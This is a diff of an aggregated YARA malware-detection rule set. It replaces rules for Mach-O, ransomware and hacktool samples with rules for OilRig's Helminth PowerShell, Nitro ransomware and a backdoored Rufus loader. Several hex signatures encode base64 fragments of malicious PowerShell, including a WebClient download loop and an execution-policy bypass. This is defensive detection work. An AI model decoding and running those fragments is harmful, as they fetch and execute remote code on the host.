48 8d 54 24 38 41 b8 10 00 00 00 48 8b c8 ff 15 f4 31 02 00 83 f8 ff 75 6b 48 8d 15 a8 c5 01 00 48 8b ce e8 48 30 00 00 48 83 cb } - $seq4 = { 40 55 48 8d ac 24 e0 fb ff ff 48 81 ec 20 05 00 00 48 8b 05 b8 fc 01 00 48 33 c4 48 89 85 10 04 00 00 48 8d 8d f1 00 00 00 33 d2 41 b8 03 01 00 00 c6 85 f0 00 00 00 00 e8 93 59 00 00 48 8d 8d 01 02 00 00 33 d2 41 b8 07 02 00 00 c6 85 00 02 00 00 00 e8 78 59 00 00 48 8d 4d e1 33 d2 41 b8 03 01 00 00 c6 45 e0 00 e8 63 59 00 00 48 8d 95 f0 00 00 00 41 b8 f4 01 00 00 33 c9 ff 15 2e 30 02 00 85 c0 0f 84 5e 01 00 00 48 8d 55 e0 b9 f4 01 00 00 48 89 9c 24 30 05 00 00 48 89 bc 24 38 05 00 00 ff 15 17 30 02 00 4c 8d 05 20 15 02 00 48 8d 4d e0 ba 04 01 00 00 e8 5a 37 00 00 48 8d 45 e0 4c 8d 0d f7 14 02 00 48 89 44 24 28 48 8d 85 f0 00 00 00 4c 8d 85 f0 00 00 00 48 8d 15 dd c3 01 00 48 8d 8d 00 02 00 00 48 89 44 24 20 e8 fc 10 00 00 33 ff 48 8d 4d e0 48 89 7c 24 30 44 8d 47 03 45 33 c9 ba 00 00 00 40 c7 44 24 28 80 00 00 00 c7 44 24 20 02 00 00 00 ff 15 6f 2f 02 00 48 8b d8 } - $seq5 = { 48 89 5c 24 10 48 89 74 24 18 48 89 7c 24 20 55 48 8d ac 24 70 f2 ff ff 48 81 ec 90 0e 00 00 48 8b 05 da ed 01 00 48 33 c4 48 89 85 80 0d 00 00 48 8b f1 48 8d 8d 81 05 00 00 33 d2 41 b8 ff 07 00 00 c6 85 80 05 00 00 00 e8 b2 4a 00 00 48 8d 4d 71 33 d2 41 b8 03 01 00 00 c6 45 70 00 e8 9d 4a 00 00 33 c0 c6 44 24 50 00 39 05 f4 1c 02 00 89 44 24 51 75 0b e8 b5 dd ff ff 89 05 e3 1c 02 00 48 8d 4d 70 e8 c6 e3 ff ff 8b 05 e8 b5 01 00 48 8d 8d 81 01 00 00 89 44 24 50 0f b6 05 da b5 01 00 33 d2 41 b8 ff 03 00 00 c6 85 80 01 00 00 00 88 44 24 54 e8 46 4a 00 00 48 8d 15 3f b6 01 00 48 8d 8d 80 01 00 00 e8 b3 1f 00 00 48 8d 4d 90 33 d2 0f 10 05 b6 b6 01 00 0f 10 0d bf b6 01 00 41 b8 d4 00 00 00 0f 29 44 24 60 0f 29 4c 24 70 0f 10 05 b8 b6 01 00 0f 29 45 80 e8 ff 49 00 00 48 83 cb ff 48 8b c3 0f 1f 84 } + $block1 = { 53 45 39 4e 52 54 30 69 4a 58 42 31 59 6d 78 70 59 79 56 63 54 47 6c 69 63 6d 46 79 61 57 56 7a 58 43 49 } + $block2 = { 43 6c 4e 46 55 6c 5a 46 55 6a 30 69 61 48 52 30 } + $block3 = { 56 34 4c 6d 46 7a 63 48 67 2f 63 6d 56 78 } + $block4 = { 6a 30 69 63 47 39 33 5a 58 4a 7a 61 47 56 73 62 43 41 69 49 69 5a 37 4a 48 64 6a 50 53 68 75 5a 58 63 74 62 32 4a 71 5a 57 4e 30 49 46 4e 35 63 33 52 6c 62 53 35 4f 5a 58 51 75 56 32 56 69 51 32 78 70 5a 57 35 30 4b 54 73 6b 64 32 4d 75 56 58 4e 6c 52 47 56 6d 59 58 56 73 64 45 4e 79 5a 57 52 6c 62 6e 52 70 59 57 78 7a 50 53 52 30 63 6e 56 6c 4f 79 52 33 59 79 35 49 5a 57 46 6b 5a 58 4a 7a 4c 6d 46 6b 5a 43 67 6e 51 57 4e 6a 5a 58 42 30 4a 79 77 6e 4b 69 38 71 4a 79 6b 37 4a 48 64 6a 4c 6b 68 6c 59 57 52 6c 63 6e 4d 75 59 57 52 6b 4b 43 64 56 63 32 56 79 4c 55 46 6e 5a 57 35 30 4a 79 77 6e 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 49 45 4a 4a 56 46 4d 76 4e 79 34 33 4a 79 6b 37 64 32 68 70 62 47 55 6f 4d 53 6c 37 64 48 4a 35 65 79 52 79 50 55 64 6c 64 43 31 53 59 57 35 6b 62 32 30 37 4a 48 64 6a 4c 6b 52 76 64 32 35 73 62 32 46 6b 52 6d 6c 73 } + $block5 = { 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 [1-4] 45 52 33 62 69 77 69 4c 56 38 [1-4] 4a 6b 64 32 34 69 4b 53} + $block6 = { 30 69 49 69 49 4e 43 6b 4e 79 5a 57 46 30 5a 55 39 69 61 6d 56 6a 64 43 67 69 56 31 4e 6a 63 6d 6c 77 64 43 35 54 61 47 56 73 62 43 49 70 4c 6c 4a 31 62 69 42 53 5a 58 42 73 59 57 4e 6c 4b 45 52 76 64 32 35 73 62 32 46 6b 52 58 68 6c 59 33 56 30 5a 53 77 69 4c 56 38 69 4c 43 4a 69 59 58 51 } + $block7 = { 51 70 72 62 32 31 6a 50 53 4a 77 62 33 64 6c 63 6e 4e 6f 5a 57 78 73 49 43 31 6c 65 47 56 6a 49 45 4a 35 63 47 46 7a 63 79 41 74 52 6d 6c 73 5a 53 41 69 4a 6b } + $block8 = { 0a b7 9a b5 e3 9b 8d e7 2d 59 27 2b 8a 9b 52 85 e9 65 46 e9 [1-4] d4 } condition: - uint16(0)==0x5a4d and filesize >60KB and 4 of ($seq*) + filesize <2KB and 6 of them } -rule ARKBIRD_SOLG_MAL_Mailo_Jun_2021_1 : FILE +rule ARKBIRD_SOLG_APT_Oilrig_PSH_Helminth_2016_1 : FILE { meta: - description = "Detect the Mach-O malware" + description = "Detect Powershell script Helminth in base 64 used by OilRig (2016)" author = "Arkbird_SOLG" - id = "4c975200-fce4-5a2a-b565-6d397c4e0b1c" - date = "2021-06-09" - modified = "2021-06-21" - reference = "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-06-19/MAIL-O/MAL_MailO_Jun_2021_1.yara#L1-L19" + id = "782503c2-a292-505c-b513-79cbbd381124" + date = "2020-08-26" + modified = "2021-07-13" + reference = "https://twitter.com/Arkbird_SOLG/status/1298758788028264450" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-26/APT_OilRig_2016.yar#L25-L45" license_url = "N/A" - logic_hash = "165c5fd90039c14ef1fa1e80bb7f14761e991b09560c5f1da2ddf9a0eadee623" + logic_hash = "0216015765f5abdb6ccf7643344aead51e4eebb19fd947f9484ce5dc6696d4d5" score = 75 - quality = 75 + quality = 61 tags = "FILE" - hash1 = "3a77f108e32b34e184f9ade66292cd73abbd297b4829ba63a973a400cc7f3f9f" - hash2 = "603881f4c80e9910ab22f39717e8b296910bff08cd0f25f78d5bff1ae0dce5d7" - tlp = "White" - adversary = "TA428" + hash1 = "1edbb818ea75919bb70bd2496e789e89d26c94cdf65ab61ebb5f1403d45d323c" + hash2 = "1191d5c1dd7f6ac38b8d72bee37415b3ff1c28a8f907971443ac3a36906e8bf5" strings: - $seq1 = { 48 8b ce e8 9e 0c f9 ff 48 8b 5c 24 20 48 8b 4c 24 28 49 8b d7 41 ff c5 ff 15 20 72 08 00 4c 8b f8 48 85 c0 0f 85 4c ff ff ff 48 8b b4 24 88 00 00 00 48 8b 4c 24 28 33 d2 ff 15 f7 71 08 00 4c 8b ac 24 90 00 00 00 4d 85 e4 0f 84 7f 01 00 00 48 8b ac 24 80 00 00 00 4d 8b c4 48 8b cd 48 8b d6 ff 53 48 49 8b cc 8b f0 e8 88 2c f8 ff 4c 8b bc 24 98 00 00 00 85 c0 0f 8e fb 00 00 00 0f 1f 84 00 00 00 00 00 41 8b d6 49 8b cc e8 95 2e f8 ff 48 8b f8 44 3b f6 75 75 49 89 07 e9 c4 00 00 00 48 8b 5c 24 20 45 33 c0 48 8b ce 41 8d 50 01 e8 a1 4b f9 ff 85 c0 0f 84 43 ff ff ff 49 8b d7 48 8b cb e8 ce e7 ff ff 48 8b d8 48 85 c0 0f 84 2c ff ff ff 49 8b cf ff 15 71 71 08 00 8b 15 ff e0 12 00 4c 8b c3 48 8b ce 48 89 03 e8 45 0c f9 ff 4d 85 e4 75 08 e8 2b 2b f8 ff 4c 8b e0 48 8b d6 49 8b cc e8 cd 2c f8 ff e9 fa fe ff ff 8b 15 ce e0 12 00 48 8b cf e8 ca 0b f9 ff 48 8b d8 48 85 c0 74 39 48 8b 48 10 ff 15 d8 70 08 00 48 8b 4b 08 33 d2 ff 15 d4 70 08 00 48 8b 0b 48 85 c9 74 06 ff 15 0e 71 08 00 41 b8 3a 06 00 00 48 8d 15 b1 71 0d 00 } - $seq2 = { 4c 8d 84 24 d0 00 00 00 4c 89 b4 24 90 01 00 00 48 8d 15 d8 a2 17 00 48 8b cd e8 50 e1 ff ff 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 0c 83 7c 24 44 01 75 05 41 b6 01 eb 03 45 32 f6 48 8b 5c 24 28 45 84 f6 74 14 f6 85 74 0e 00 00 08 74 0b 48 8b d3 48 8b ce e8 15 03 00 00 48 8b cb e8 5d f4 ff ff 45 84 f6 74 17 f7 85 74 0e 00 00 00 10 00 00 74 0b 48 8b d3 48 8b cd e8 d1 01 00 00 48 83 bd 38 07 00 00 00 74 33 b2 01 48 8b cd e8 1d f1 fe ff 48 8b 8d 40 07 00 00 45 33 c0 48 8b d3 ff 95 38 07 00 00 33 d2 48 8b cd 44 8b f0 e8 fd f0 fe ff 41 83 fe 02 75 51 41 b4 01 8b 44 24 40 83 f8 02 74 05 83 f8 17 75 5a 48 8d 4c 24 50 e8 ac 81 02 00 44 8b 44 24 40 44 8b c8 48 8b d3 48 8b ce e8 d9 f8 ff ff 8b f8 85 c0 74 37 48 8b d3 48 8b ce e8 68 eb ff ff b8 07 00 00 00 83 ff 01 0f 44 f8 } - $seq3 = { 48 8b d0 48 8d 4d 80 41 ff d4 48 8b cb ff 15 f2 fa 1e 00 48 8d 95 e0 00 00 00 48 8d 4d 80 41 ff d7 f6 47 3c 02 48 8d 8d 90 00 00 00 48 0f 44 4c 24 50 e8 f6 04 00 00 4c 8b f0 48 85 c0 0f 84 05 fe ff ff 48 8b 47 28 49 8b d6 4c 8b 0f 4c 8b 47 10 48 85 c0 74 53 48 8d 8d e0 00 00 00 48 89 4c 24 40 48 8d 0d 94 90 15 00 48 89 44 24 38 8b 47 38 89 44 24 30 48 8b 47 08 48 89 44 24 28 48 8b 44 24 58 48 89 44 24 20 e8 e0 42 fc ff 48 8b 4f 28 48 8d 15 b9 8e 15 00 48 8b d8 e8 3d 7a fd ff 85 c0 74 2a ff 47 38 eb 25 48 8d 85 e0 00 00 00 48 89 44 24 28 48 8d 0d a1 90 15 00 48 8b 44 24 58 48 89 44 24 20 e8 a2 42 fc ff 48 8b d8 49 8b ce ff 15 2e fa 1e 00 48 85 db 0f 84 68 fd ff ff 4c 8b 47 20 4d 85 c0 74 27 48 8b d3 48 8d 0d aa 90 15 00 e8 75 42 fc ff 48 8b cb 4c 8b f0 ff 15 01 fa 1e 00 4d 85 f6 0f 84 3b fd ff ff 49 8b de 4c 8b 47 30 4d 85 c0 74 27 48 8b d3 48 8d 0d 8a 90 15 00 e8 45 42 fc ff 48 8b cb 4c 8b f0 ff 15 d1 f9 1e 00 4d 85 f6 0f 84 0b fd ff ff 49 8b de f6 47 3c 02 74 27 48 8b d3 48 8d 0d 75 90 15 00 e8 18 42 fc ff 48 8b cb 48 8b f8 ff 15 a4 f9 1e 00 48 } - $seq4 = { 48 81 ec 08 03 00 00 48 8b 05 e2 61 23 00 48 33 c4 48 89 84 24 f0 02 00 00 33 d2 48 8d 8c 24 e0 00 00 00 41 b8 08 02 00 00 e8 c2 f5 16 00 41 b8 04 01 00 00 48 8d 94 24 e0 00 00 00 48 8d 0d c5 94 21 00 ff 15 07 ee 18 00 48 8d 8c 24 e0 00 00 00 ff 15 d1 ef 18 00 85 c0 74 63 33 d2 48 8d 4c 24 70 44 8d 42 68 e8 85 f5 16 00 b8 05 00 00 00 c7 44 24 70 68 00 00 00 66 89 84 24 b0 00 00 00 48 8d 8c 24 e0 00 00 00 48 8d 44 24 50 45 33 c9 48 89 44 24 48 45 33 c0 48 8d 44 24 70 33 d2 48 89 44 24 40 33 c0 48 89 44 24 38 48 89 44 24 30 89 44 24 28 89 44 24 20 ff 15 52 ed 18 00 48 8b 8c 24 f0 02 00 00 48 33 cc e8 c2 cf 16 00 48 } - $seq5 = { 48 89 74 24 48 48 8d 0d 99 5e 18 00 4c 89 74 24 50 48 8b d5 4c 89 7c 24 58 e8 5f 13 17 00 4c 8d b7 0c 08 00 00 49 63 06 85 c0 0f 84 b0 00 00 00 48 8b c8 48 c1 e1 03 ff 15 a8 5f 22 00 48 8b f0 48 85 c0 0f 84 04 01 00 00 45 33 ff ba 00 01 00 00 41 8b df 90 48 8b 07 48 85 c0 74 16 4c 39 78 28 74 08 8b cb ff c3 48 89 04 ce 48 8b 00 48 85 c0 75 ea 48 83 c7 08 48 83 ea 01 75 d8 49 63 16 4c 8d 0d ce 01 00 00 41 b8 08 00 00 00 48 8b ce e8 c0 14 17 00 85 db 74 3e 4c 8b f6 49 8b 0e e8 c1 03 00 00 48 8b f8 48 8b cd 48 85 c0 0f 84 85 00 00 00 4c 8b c0 48 8d 15 58 5a 18 00 e8 33 a8 ff ff 48 8b cf ff 15 22 5f 22 00 41 ff c7 49 83 c6 08 44 } + $block1 = { 70 74 65 57 6c 6b 49 44 30 67 4a 79 4d 6a 49 79 63 67 44 51 6f 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 67 50 53 41 69 4a 47 56 75 64 6a 70 51 64 } + $block2 = { 41 67 ?? ?? 42 6c 62 48 4e 6c 61 57 59 6f 4a 47 31 35 5a 6d 78 68 5a 7a 4d 67 4c 57 56 78 49 44 49 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 67 6e 64 33 63 6e 4b 79 52 6e 62 47 39 69 59 57 77 36 62 58 6c 70 5a 43 73 6b 59 32 31 6b 61 57 51 72 4a 48 42 68 63 6e 52 70 5a 43 73 6f } + $block3 = { 6a 61 47 46 79 58 53 42 62 61 57 35 30 58 53 41 6b 64 47 31 77 57 7a 42 64 4b 53 41 72 49 43 } + $block4 = { 43 52 6a 62 6e 51 67 4c 57 56 78 49 44 49 31 4b 53 6b 67 44 51 6f 67 49 43 41 67 65 79 41 } + $block5 = { 5a 6c 52 45 35 54 49 43 67 6b 5a 43 6b 67 44 51 70 37 49 41 30 4b 43 53 52 6a 62 6e 51 67 50 53 41 77 49 41 30 4b 43 58 64 6f 61 57 78 6c 49 43 67 6b 59 32 35 30 49 43 31 73 64 43 41 79 4d 43 6b 67 44 51 6f 4a 65 79 41 4e 43 67 6b 4a 64 48 4a 35 49 41 30 4b 43 51 6c 37 } + $block6 = { 4b 49 43 41 67 49 43 41 67 49 43 41 6b 61 53 73 72 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 49 43 41 67 61 57 59 6f 4a 48 4a 6c 64 43 41 74 5a 58 45 67 4d 53 6b 67 44 51 6f 67 49 43 41 } + $block7 = { 77 36 62 58 6c 6d 62 47 46 6e 49 44 30 67 4d 43 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 43 41 67 49 47 56 73 63 32 56 70 5a 69 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 5a 73 59 57 63 67 4c 57 56 78 49 44 45 70 49 41 30 4b 49 43 41 67 49 48 73 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 52 30 62 58 41 67 50 53 41 6b 62 58 6c 6b 59 58 52 68 4c 6c 4e 77 62 47 6c 30 4b 43 63 75 4a 79 6b 67 44 51 6f 67 49 43 41 67 49 43 41 67 49 46 74 54 65 58 4e 30 5a 57 30 75 53 55 38 75 52 6d 6c 73 5a 56 30 36 4f 6b 46 77 63 47 56 75 5a 45 46 73 62 46 52 6c 65 48 51 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 72 4a 47 64 73 62 32 4a 68 62 44 70 6d 61 57 78 6c 62 6d 46 74 } + $block8 = { 4a 47 6b 72 4b 79 41 4e 43 69 41 67 49 43 42 39 49 41 30 4b 49 48 30 67 44 51 6f 67 44 51 6f 67 5a 6e 56 75 59 33 52 70 62 32 34 67 52 32 56 30 53 55 [1-10] 4e 43 69 41 67 49 43 41 6b 5a 32 78 76 59 6d 46 73 4f 6d 31 35 61 57 51 67 50 53 42 54 5a 57 35 6b 55 6d 56 6a 5a 57 6c 32 5a 55 52 4f 55 79 41 6f 4b 45 64 6c 64 46 4e 31 59 69 41 77 4b 53 73 6e 4d 7a 41 6e 4b 53 41 4e 43 69 42 39 49 41 30 4b 49 41 30 4b 49 47 5a 31 62 6d 4e 30 61 57 39 [1-10] 56 52 6f 61 58 4e 47} + $block9 = { 73 67 44 51 6f 4a 43 57 31 6b 49 43 31 47 62 33 4a 6a 5a 53 41 6f 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 68 76 62 57 55 72 4a 33 52 77 58 43 63 70 49 41 30 4b 43 51 6c 48 5a 58 52 4a 52 43 41 4e 43 67 6b 4a 51 32 68 68 62 6d 64 6c 56 47 68 70 63 30 5a 70 62 47 55 67 4a 47 64 73 62 32 4a 68 62 44 70 74 65 57 6c 6b 49 41 30 4b 49 43 41 67 49 48 30 67 44 51 6f 67 66 53 41 4e 43 69 42 6d 64 57 35 6a 64 47 6c 76 62 69 42 74 59 57 6c 75 49 41 30 4b } condition: - uint16(0)==0x5a4d and filesize >300KB and 4 of ($seq*) + filesize <3KB and 7 of them } -rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE +rule ARKBIRD_SOLG_RAN_Nitro_Aug_2021_1 : FILE { meta: - description = "Detect HelloKitty ransomware" + description = "Detect Nitro ransomware" author = "Arkbird_SOLG" - id = "3e83f07a-0ee7-5381-9aba-2606c01b9d91" - date = "2021-08-14" - modified = "2021-08-14" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-14/HelloKitty/RAN_ELF_HelloKitty_Aug_2021_1.yara#L1-L17" + id = "256059b2-1683-5108-8fc8-3cf0b2e7b613" + date = "2021-08-12" + modified = "2021-08-13" + reference = "https://bazaar.abuse.ch/browse/tag/NitroRansomware/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-13/Nitro/RAN_Nitro_Aug_2021_1.yara#L1-L23" license_url = "N/A" - logic_hash = "99816756ea0a680eb25da192c9f069082f6479befe4e50188ad8f90b323d1f2d" + logic_hash = "c31267cd9bc6c63db8e32b2a0e7518b0432d62f1de52117b9e903fc3370a1f4d" score = 75 quality = 75 tags = "FILE" - hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041" - hash2 = "b4f90cff1e3900a3906c3b74f307498760462d719c31d008fc01937f5400fb85" - tlp = "White" - adversary = "RAAS" + hash1 = "1194aebc9a0016084f6966b07a171e4c62ce1b21580d177a876873641692ee13" + hash2 = "6546f0638160cb590b4ead2401fb55d48e10b2ee1808ff0354fff52c9e2f62bf" + hash3 = "89dbea1e4b387325f21c784dc72fcf52599f69e1ded27d1b830ff57ae4831559" + hash4 = "d8e9561612c6e06160d79abde41c7b66e4921a1c041ad5c2658d43050b4fd2d0" + hash5 = "dbed3399932fabe6f7f863403279ac9a6b075aa307dd445df2c7060157d3063b" + tlp = "white" + adversary = "-" strings: - $seq1 = { 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 14 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 3d ?? 14 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 13 21 00 48 8b 3d ?? 12 21 00 48 89 e9 ba ?? 0c 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e2 ff ff 48 8b 05 [2] 21 00 b9 ?? 0c 41 00 ba 80 00 00 00 be 01 00 00 00 4c 89 e7 48 8b 04 18 44 8b 00 31 c0 e8 ?? e5 ff ff 4c 89 e7 e8 cd 10 00 00 48 85 c0 49 89 c7 0f 84 9b 00 00 00 48 83 3d ?? 13 21 00 00 74 60 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 ?? e3 ff ff 48 8b 05 ?? 12 21 00 48 8b 3d ?? 13 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff 48 8b 3d ?? 13 21 00 e8 ?? e6 ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 05 ?? 12 21 00 48 8b 3d [2] 21 00 48 89 e9 ba [2] 41 00 be 01 00 00 00 48 8b 04 18 44 8b 00 31 c0 e8 ?? e1 ff ff } - $seq2 = { 31 c0 b9 40 00 00 00 48 89 ef f3 ab be ?? 0d 41 00 48 89 df e8 [2] ff ff 48 85 c0 49 89 c5 0f 84 4c 01 00 00 48 89 c2 48 89 de 48 89 ef 48 29 da e8 71 07 00 00 be 3a 00 00 00 48 89 ef e8 [2] ff ff 48 8d 78 01 e8 [2] ff ff 85 c0 41 89 c7 0f 84 04 01 00 00 bf 10 00 00 00 e8 ?? dd ff ff 4c 89 ef 44 89 38 49 89 c6 48 89 04 24 e8 3d f5 ff ff 48 83 3d ?? 0e 21 00 00 49 89 46 08 74 6f 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d ?? 0d 21 00 ba ?? 0d 41 00 48 2b 0d ?? 0d 21 00 48 8b 3d ?? 0e 21 00 be 01 00 00 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 ?? dc ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 04 24 48 8b 0d [2] 21 00 be 01 00 00 00 48 2b 0d [2] 21 00 48 8b 3d ?? 0c 21 00 ba ?? 0d 41 00 4c 8b 48 08 44 8b 00 31 c0 48 c1 f9 03 48 ff c1 e8 [2] ff ff 48 8b 35 [2] 21 00 48 3b 35 [2] 21 00 74 16 48 85 f6 74 07 48 8b 04 24 48 89 06 48 83 05 [2] 21 00 08 eb 0d 48 89 e2 bf e0 49 61 00 e8 af 02 00 00 48 8d 7b 01 be ?? 0d 41 00 e8 ?? dd ff ff 48 89 c3 e9 86 fe ff ff 4d 85 e4 74 08 4c 89 e7 e8 [2] ff ff 48 83 3d ?? 0d 21 00 00 74 61 48 8d 74 24 08 bf d0 4a 61 00 48 c7 44 24 10 00 00 00 00 48 c7 44 24 08 01 00 00 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d ?? 0c 21 00 ba ?? 0d 41 00 48 8b 3d ?? 0d 21 00 be 01 00 00 00 31 c0 48 c1 f9 03 e8 ?? db ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 48 8b 0d ?? 0c 21 00 48 2b 0d [2] 21 00 31 c0 48 8b 3d ?? 0b 21 00 ba ?? 0d 41 00 be 01 00 00 00 48 c1 f9 03 e8 [2] ff ff 48 8b 84 24 18 01 00 00 64 48 33 04 25 28 00 00 } - $seq3 = { 48 8d b4 24 90 00 00 00 bf d0 4a 61 00 48 c7 84 24 98 00 00 00 00 00 00 00 48 c7 84 24 90 00 00 00 01 00 00 00 e8 [2] ff ff e8 ?? 22 00 00 89 44 24 08 8b 05 [2] 21 00 89 d9 44 8b 0d [2] 21 00 44 8b 05 [2] 21 00 ba ?? 0e 41 00 48 8b 3d [2] 21 00 be 01 00 00 00 89 04 24 31 c0 e8 ?? f8 ff ff 48 8b 3d [2] 21 00 e8 [2] ff ff bf d0 4a 61 00 e8 [2] ff ff 31 f6 ba 0a 00 00 00 bf 40 4a 61 00 e8 ?? fa ff ff ba 0a 00 00 00 31 f6 bf 20 4a 61 00 e8 ?? fa ff ff be 01 00 00 00 bf 11 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 14 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 16 00 00 00 e8 [2] ff ff be 01 00 00 00 bf 15 00 00 00 e8 [2] ff ff 83 3d ?? 28 21 00 00 } + $s1 = { 1f 1a 28 ?? 00 00 0a [0-2] 72 ?? 14 00 70 28 15 00 00 0a 80 32 00 00 04 28 ?? 00 00 06 7e 32 00 00 04 6f ?? 00 00 0a [0-1] 7e 2f 00 00 04 16 7e 32 00 00 04 7e 30 00 00 04 7e 31 00 00 04 60 28 ?? 00 00 06 26 2a } + $s2 = { 02 [0-5] 72 df 00 00 70 28 1b 00 00 } + $s3 = { 1f 1a 28 ?? 00 00 0a 0a 1f 1c 28 ?? 00 00 0a 0b 7e 21 00 00 04 06 72 ?? 0c 00 70 28 15 00 00 0a 6f 16 00 00 0a [2] ?? 00 } + $s4 = { 7e 4e 00 00 0a 0a [0-1] 72 [2] 00 70 73 ?? 00 00 06 0b [0-1] 07 72 [2] 00 70 6f ?? 00 00 06 [1-3] 8d 7f 00 00 01 25 16 1f 0a 9d 6f ?? 00 00 0a 1c 9a 0a [0-1] de ?? 07 2c ?? 07 6f 42 00 00 0a } + $s5 = { 7e 4e 00 00 0a 0a [0-1] 73 ?? 00 00 0a 0b [0-1] 07 72 ?? 14 00 70 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 6f ?? 00 00 0a 6f ?? 00 00 0a [0-2] 6f ?? 00 00 0a 0a } condition: - uint32(0)==0x464C457F and filesize >20KB and all of ($seq*) + uint16(0)==0x5A4D and filesize >25KB and all of ($s*) } /* * YARA Rule Set * Repository Name: Telekom Security * Repository: https://github.com/telekom-security/malware_analysis/ - * Retrieval Date: 2024-09-08 + * Retrieval Date: 2024-09-29 * Git Commit: bf832d97e8fd292ec5e095e35bde992a6462e71c * Number of Rules: 12 * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance) @@ -200553,51 +202421,33 @@ rule ARKBIRD_SOLG_RAN_ELF_Hellokitty_Aug_2021_1 : FILE * * NO LICENSE SET */ -rule TELEKOM_SECURITY_Get_Windows_Proxy_Configuration : CAPABILITY HACKTOOL +rule TELEKOM_SECURITY_Vatet_Loader_Rufus_Backdoor : DEFRAY777 { meta: - description = "Queries Windows Registry for proxy configuration" + description = "Detects backdoored Rufus with Vatet Loader of Defray777" author = "Thomas Barabosch, Deutsche Telekom Security" - id = "b67b0b70-a95f-5c65-a522-ef4f41e36159" - date = "2022-01-14" - modified = "2023-12-12" - reference = "https://docs.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-ie-clientnetworkprotocolimplementation-hklmproxyserver" - source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L44-L57" + id = "1f6fa228-300c-59de-b89c-3cbdce1b6374" + date = "2022-03-18" + modified = "2022-03-18" + reference = "https://unit42.paloaltonetworks.com/vatet-pyxie-defray777" + source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/defray777/vatet_loader.yar#L1-L27" license_url = "N/A" - logic_hash = "db52782a56d42f6e460466ea46993490bbbceeb7422d45211f064edb2e37a8eb" + logic_hash = "3767398112759689078f992eb272cfec3e59f6d9ca30f8da68c2053e1217fd18" score = 75 - quality = 70 - tags = "CAPABILITY, HACKTOOL" - - strings: - $a = "Software\\Microsoft\\Windows\\Currentversion\\Internet Settings" ascii wide - $b = "ProxyEnable" ascii wide - $c = "ProxyServer" ascii wide - - condition: - all of them -} -rule TELEKOM_SECURITY_Cn_Utf8_Windows_Terminal : CAPABILITY HACKTOOL -{ - meta: - description = "This is a (dirty) hack to display UTF-8 on Windows command prompt." - author = "Thomas Barabosch, Deutsche Telekom Security" - id = "a1beee71-c526-58fb-a255-dba55ef7535b" - date = "2022-01-14" - modified = "2023-12-12" - reference = "https://www.bitdefender.com/files/News/CaseStudies/study/401/Bitdefender-PR-Whitepaper-FIN8-creat5619-en-EN.pdf" - source_url = "https://github.com/telekom-security/malware_analysis//blob/bf832d97e8fd292ec5e095e35bde992a6462e71c/hacktools/hacktools.yar#L59-L71" - license_url = "N/A" - logic_hash = "4c91280c3d6d3b48c4ee11bf3d0c2baecee1368fbf3951c0a3bf386454c557cf" - score = 40 quality = 20 - tags = "CAPABILITY, HACKTOOL" + tags = "DEFRAY777" + sharing = "TLP:WHITE" + hash_1 = "c9c1caae50459896a15dce30eaca91e49e875207054d98e32e16a3e203446569" + hash_2 = "0cb8fc89541969304f3bf806e938452b36348bdd0280fc8f4e9221993e745334" + in_memory = "False" strings: - $a = " chcp 65001 " 